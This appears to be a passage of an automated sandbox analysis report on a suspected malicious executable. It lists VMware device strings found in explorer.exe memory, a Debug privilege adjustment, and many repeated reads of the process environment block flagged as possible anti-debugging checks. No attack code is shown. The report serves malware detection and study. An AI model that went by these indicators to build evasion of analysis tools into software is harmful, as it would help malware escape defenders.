          Source: explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.4537110885.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe Code function: 3_2_00F1C0F0 mov eax, dword ptr fs:[00000030h] 3_2_00F1C0F0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA6420 mov eax, dword ptr fs:[00000030h]3_2_00FA6420
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA6420 mov eax, dword ptr fs:[00000030h]3_2_00FA6420
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA6420 mov eax, dword ptr fs:[00000030h]3_2_00FA6420
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA6420 mov eax, dword ptr fs:[00000030h]3_2_00FA6420
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F58402 mov eax, dword ptr fs:[00000030h]3_2_00F58402
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F58402 mov eax, dword ptr fs:[00000030h]3_2_00F58402
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F58402 mov eax, dword ptr fs:[00000030h]3_2_00F58402
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F225E0 mov eax, dword ptr fs:[00000030h]3_2_00F225E0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C5ED mov eax, dword ptr fs:[00000030h]3_2_00F5C5ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C5ED mov eax, dword ptr fs:[00000030h]3_2_00F5C5ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F265D0 mov eax, dword ptr fs:[00000030h]3_2_00F265D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A5D0 mov eax, dword ptr fs:[00000030h]3_2_00F5A5D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A5D0 mov eax, dword ptr fs:[00000030h]3_2_00F5A5D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E5CF mov eax, dword ptr fs:[00000030h]3_2_00F5E5CF
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E5CF mov eax, dword ptr fs:[00000030h]3_2_00F5E5CF
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F445B1 mov eax, dword ptr fs:[00000030h]3_2_00F445B1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F445B1 mov eax, dword ptr fs:[00000030h]3_2_00F445B1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA05A7 mov eax, dword ptr fs:[00000030h]3_2_00FA05A7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA05A7 mov eax, dword ptr fs:[00000030h]3_2_00FA05A7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA05A7 mov eax, dword ptr fs:[00000030h]3_2_00FA05A7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E59C mov eax, dword ptr fs:[00000030h]3_2_00F5E59C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F22582 mov eax, dword ptr fs:[00000030h]3_2_00F22582
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F22582 mov ecx, dword ptr fs:[00000030h]3_2_00F22582
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F54588 mov eax, dword ptr fs:[00000030h]3_2_00F54588
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5656A mov eax, dword ptr fs:[00000030h]3_2_00F5656A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5656A mov eax, dword ptr fs:[00000030h]3_2_00F5656A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5656A mov eax, dword ptr fs:[00000030h]3_2_00F5656A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F28550 mov eax, dword ptr fs:[00000030h]3_2_00F28550
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F28550 mov eax, dword ptr fs:[00000030h]3_2_00F28550
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30535 mov eax, dword ptr fs:[00000030h]3_2_00F30535
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30535 mov eax, dword ptr fs:[00000030h]3_2_00F30535
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30535 mov eax, dword ptr fs:[00000030h]3_2_00F30535
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30535 mov eax, dword ptr fs:[00000030h]3_2_00F30535
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30535 mov eax, dword ptr fs:[00000030h]3_2_00F30535
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30535 mov eax, dword ptr fs:[00000030h]3_2_00F30535
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E53E mov eax, dword ptr fs:[00000030h]3_2_00F4E53E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E53E mov eax, dword ptr fs:[00000030h]3_2_00F4E53E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E53E mov eax, dword ptr fs:[00000030h]3_2_00F4E53E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E53E mov eax, dword ptr fs:[00000030h]3_2_00F4E53E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E53E mov eax, dword ptr fs:[00000030h]3_2_00F4E53E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB6500 mov eax, dword ptr fs:[00000030h]3_2_00FB6500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E6F2 mov eax, dword ptr fs:[00000030h]3_2_00F9E6F2
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E6F2 mov eax, dword ptr fs:[00000030h]3_2_00F9E6F2
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E6F2 mov eax, dword ptr fs:[00000030h]3_2_00F9E6F2
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E6F2 mov eax, dword ptr fs:[00000030h]3_2_00F9E6F2
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA06F1 mov eax, dword ptr fs:[00000030h]3_2_00FA06F1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA06F1 mov eax, dword ptr fs:[00000030h]3_2_00FA06F1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A6C7 mov ebx, dword ptr fs:[00000030h]3_2_00F5A6C7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A6C7 mov eax, dword ptr fs:[00000030h]3_2_00F5A6C7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F566B0 mov eax, dword ptr fs:[00000030h]3_2_00F566B0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C6A6 mov eax, dword ptr fs:[00000030h]3_2_00F5C6A6
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F24690 mov eax, dword ptr fs:[00000030h]3_2_00F24690
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F24690 mov eax, dword ptr fs:[00000030h]3_2_00F24690
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F52674 mov eax, dword ptr fs:[00000030h]3_2_00F52674
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE866E mov eax, dword ptr fs:[00000030h]3_2_00FE866E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE866E mov eax, dword ptr fs:[00000030h]3_2_00FE866E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A660 mov eax, dword ptr fs:[00000030h]3_2_00F5A660
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A660 mov eax, dword ptr fs:[00000030h]3_2_00F5A660
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3C640 mov eax, dword ptr fs:[00000030h]3_2_00F3C640
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3E627 mov eax, dword ptr fs:[00000030h]3_2_00F3E627
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F56620 mov eax, dword ptr fs:[00000030h]3_2_00F56620
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F58620 mov eax, dword ptr fs:[00000030h]3_2_00F58620
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2262C mov eax, dword ptr fs:[00000030h]3_2_00F2262C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62619 mov eax, dword ptr fs:[00000030h]3_2_00F62619
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E609 mov eax, dword ptr fs:[00000030h]3_2_00F9E609
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F247FB mov eax, dword ptr fs:[00000030h]3_2_00F247FB
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F247FB mov eax, dword ptr fs:[00000030h]3_2_00F247FB
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F427ED mov eax, dword ptr fs:[00000030h]3_2_00F427ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F427ED mov eax, dword ptr fs:[00000030h]3_2_00F427ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F427ED mov eax, dword ptr fs:[00000030h]3_2_00F427ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAE7E1 mov eax, dword ptr fs:[00000030h]3_2_00FAE7E1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2C7C0 mov eax, dword ptr fs:[00000030h]3_2_00F2C7C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA07C3 mov eax, dword ptr fs:[00000030h]3_2_00FA07C3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F207AF mov eax, dword ptr fs:[00000030h]3_2_00F207AF
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC678E mov eax, dword ptr fs:[00000030h]3_2_00FC678E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F28770 mov eax, dword ptr fs:[00000030h]3_2_00F28770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F20750 mov eax, dword ptr fs:[00000030h]3_2_00F20750
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62750 mov eax, dword ptr fs:[00000030h]3_2_00F62750
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62750 mov eax, dword ptr fs:[00000030h]3_2_00F62750
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAE75D mov eax, dword ptr fs:[00000030h]3_2_00FAE75D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA4755 mov eax, dword ptr fs:[00000030h]3_2_00FA4755
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5674D mov esi, dword ptr fs:[00000030h]3_2_00F5674D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5674D mov eax, dword ptr fs:[00000030h]3_2_00F5674D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5674D mov eax, dword ptr fs:[00000030h]3_2_00F5674D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5273C mov eax, dword ptr fs:[00000030h]3_2_00F5273C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5273C mov ecx, dword ptr fs:[00000030h]3_2_00F5273C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5273C mov eax, dword ptr fs:[00000030h]3_2_00F5273C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9C730 mov eax, dword ptr fs:[00000030h]3_2_00F9C730
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C720 mov eax, dword ptr fs:[00000030h]3_2_00F5C720
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C720 mov eax, dword ptr fs:[00000030h]3_2_00F5C720
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F20710 mov eax, dword ptr fs:[00000030h]3_2_00F20710
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F50710 mov eax, dword ptr fs:[00000030h]3_2_00F50710
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C700 mov eax, dword ptr fs:[00000030h]3_2_00F5C700
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C8F9 mov eax, dword ptr fs:[00000030h]3_2_00F5C8F9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C8F9 mov eax, dword ptr fs:[00000030h]3_2_00F5C8F9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEA8E4 mov eax, dword ptr fs:[00000030h]3_2_00FEA8E4
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E8C0 mov eax, dword ptr fs:[00000030h]3_2_00F4E8C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAC89D mov eax, dword ptr fs:[00000030h]3_2_00FAC89D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F20887 mov eax, dword ptr fs:[00000030h]3_2_00F20887
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAE872 mov eax, dword ptr fs:[00000030h]3_2_00FAE872
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAE872 mov eax, dword ptr fs:[00000030h]3_2_00FAE872
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB6870 mov eax, dword ptr fs:[00000030h]3_2_00FB6870
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB6870 mov eax, dword ptr fs:[00000030h]3_2_00FB6870
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F50854 mov eax, dword ptr fs:[00000030h]3_2_00F50854
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F24859 mov eax, dword ptr fs:[00000030h]3_2_00F24859
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F24859 mov eax, dword ptr fs:[00000030h]3_2_00F24859
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F32840 mov ecx, dword ptr fs:[00000030h]3_2_00F32840
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F42835 mov eax, dword ptr fs:[00000030h]3_2_00F42835
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F42835 mov eax, dword ptr fs:[00000030h]3_2_00F42835
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F42835 mov eax, dword ptr fs:[00000030h]3_2_00F42835
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F42835 mov ecx, dword ptr fs:[00000030h]3_2_00F42835
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F42835 mov eax, dword ptr fs:[00000030h]3_2_00F42835
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F42835 mov eax, dword ptr fs:[00000030h]3_2_00F42835
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A830 mov eax, dword ptr fs:[00000030h]3_2_00F5A830
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC483A mov eax, dword ptr fs:[00000030h]3_2_00FC483A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC483A mov eax, dword ptr fs:[00000030h]3_2_00FC483A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAC810 mov eax, dword ptr fs:[00000030h]3_2_00FAC810
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F529F9 mov eax, dword ptr fs:[00000030h]3_2_00F529F9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F529F9 mov eax, dword ptr fs:[00000030h]3_2_00F529F9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAE9E0 mov eax, dword ptr fs:[00000030h]3_2_00FAE9E0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F2A9D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F2A9D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F2A9D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F2A9D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F2A9D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F2A9D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F549D0 mov eax, dword ptr fs:[00000030h]3_2_00F549D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEA9D3 mov eax, dword ptr fs:[00000030h]3_2_00FEA9D3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB69C0 mov eax, dword ptr fs:[00000030h]3_2_00FB69C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA89B3 mov esi, dword ptr fs:[00000030h]3_2_00FA89B3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA89B3 mov eax, dword ptr fs:[00000030h]3_2_00FA89B3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA89B3 mov eax, dword ptr fs:[00000030h]3_2_00FA89B3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F209AD mov eax, dword ptr fs:[00000030h]3_2_00F209AD
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F209AD mov eax, dword ptr fs:[00000030h]3_2_00F209AD
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC4978 mov eax, dword ptr fs:[00000030h]3_2_00FC4978
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC4978 mov eax, dword ptr fs:[00000030h]3_2_00FC4978
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAC97C mov eax, dword ptr fs:[00000030h]3_2_00FAC97C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F46962 mov eax, dword ptr fs:[00000030h]3_2_00F46962
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F46962 mov eax, dword ptr fs:[00000030h]3_2_00F46962
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F46962 mov eax, dword ptr fs:[00000030h]3_2_00F46962
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F6096E mov eax, dword ptr fs:[00000030h]3_2_00F6096E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F6096E mov edx, dword ptr fs:[00000030h]3_2_00F6096E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F6096E mov eax, dword ptr fs:[00000030h]3_2_00F6096E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA0946 mov eax, dword ptr fs:[00000030h]3_2_00FA0946
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA892A mov eax, dword ptr fs:[00000030h]3_2_00FA892A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB892B mov eax, dword ptr fs:[00000030h]3_2_00FB892B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAC912 mov eax, dword ptr fs:[00000030h]3_2_00FAC912
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F18918 mov eax, dword ptr fs:[00000030h]3_2_00F18918
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F18918 mov eax, dword ptr fs:[00000030h]3_2_00F18918
